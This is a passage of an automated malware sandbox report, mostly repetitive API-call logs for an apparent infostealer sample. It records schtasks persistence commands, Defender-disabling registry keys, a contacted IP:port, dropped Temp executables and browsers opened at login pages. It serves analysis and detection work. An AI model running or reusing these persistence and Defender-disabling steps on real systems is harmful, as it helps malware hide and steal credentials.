                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000044
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          2580
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          2856
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          2856
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          2856
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          2856
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          2856
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    cmdline
                                    schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    dead_host
                                    5.42.64.33:80
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            attempts to modify windows defender policies
                                        
                                    
                                        
                                            registry
                                            HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            attempts to modify windows defender policies
                                        
                                    
                                        
                                            registry
                                            HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            attempts to modify windows defender policies
                                        
                                    
                                        
                                            registry
                                            HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            attempts to modify windows defender policies
                                        
                                    
                                        
                                            registry
                                            HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            attempts to modify windows defender policies
                                        
                                    
                                        
                                            registry
                                            HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            attempts to modify windows defender policies
                                        
                                    
                                        
                                            registry
                                            HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
                                        
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000130
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          2540
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          2676
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000138
        
      
      
      

    
  
    
      process_identifier:
      
        
          2672
        
      
      
      

    
  
    
      current_directory:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
        
      
      
      

    
  
    
      filepath_r:
      
        
          
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          134217728
        
      
      
        (CREATE_NO_WINDOW)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000013c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          2760
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000144
        
      
      
      

    
  
    
      process_identifier:
      
        
          2756
        
      
      
      

    
  
    
      current_directory:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
        
      
      
      

    
  
    
      filepath_r:
      
        
          
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          134217728
        
      
      
        (CREATE_NO_WINDOW)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000140
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x000001bc
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          2540
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          2964
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x0000063c
        
      
      
      

    
  
    
      process_identifier:
      
        
          2960
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\xHLWqppYh13Be9jJk15F.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\xHLWqppYh13Be9jJk15F.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\xHLWqppYh13Be9jJk15F.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000640
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          2492
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000640
        
      
      
      

    
  
    
      process_identifier:
      
        
          2488
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\vhaNZRtsx6oDxE2wLedH.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\vhaNZRtsx6oDxE2wLedH.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\vhaNZRtsx6oDxE2wLedH.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000648
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          2792
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000644
        
      
      
      

    
  
    
      process_identifier:
      
        
          2800
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\6IaVlI6Bnvzzy7JvUjLd.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\6IaVlI6Bnvzzy7JvUjLd.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\6IaVlI6Bnvzzy7JvUjLd.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000064c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          1616
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000644
        
      
      
      

    
  
    
      process_identifier:
      
        
          2884
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\XB6HWAvSS60oS8YtMo1a.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\XB6HWAvSS60oS8YtMo1a.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\XB6HWAvSS60oS8YtMo1a.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000648
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          2936
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x0000064c
        
      
      
      

    
  
    
      process_identifier:
      
        
          2944
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\y0cb10l651CUsg6eGw3C.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\y0cb10l651CUsg6eGw3C.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\y0cb10l651CUsg6eGw3C.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000650
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          3016
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x000001e0
        
      
      
      

    
  
    
      process_identifier:
      
        
          3012
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000001e4
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000260
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          2960
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          1608
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x000002bc
        
      
      
      

    
  
    
      process_identifier:
      
        
          2856
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634196
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000002c8
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x000002bc
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          2856
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          2000
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x000002bc
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634196
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000002d8
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x000002bc
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          2444
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000280
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634196
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000001e8
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000280
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          560
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000288
        
      
      
      

    
  
    
      process_identifier:
      
        
          176
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Program Files\Mozilla Firefox\firefox.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Program Files\Mozilla Firefox\firefox.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634196
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000024c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000288
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          176
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          2212
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000288
        
      
      
      

    
  
    
      process_identifier:
      
        
          2208
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Program Files\Mozilla Firefox\firefox.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Program Files\Mozilla Firefox\firefox.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
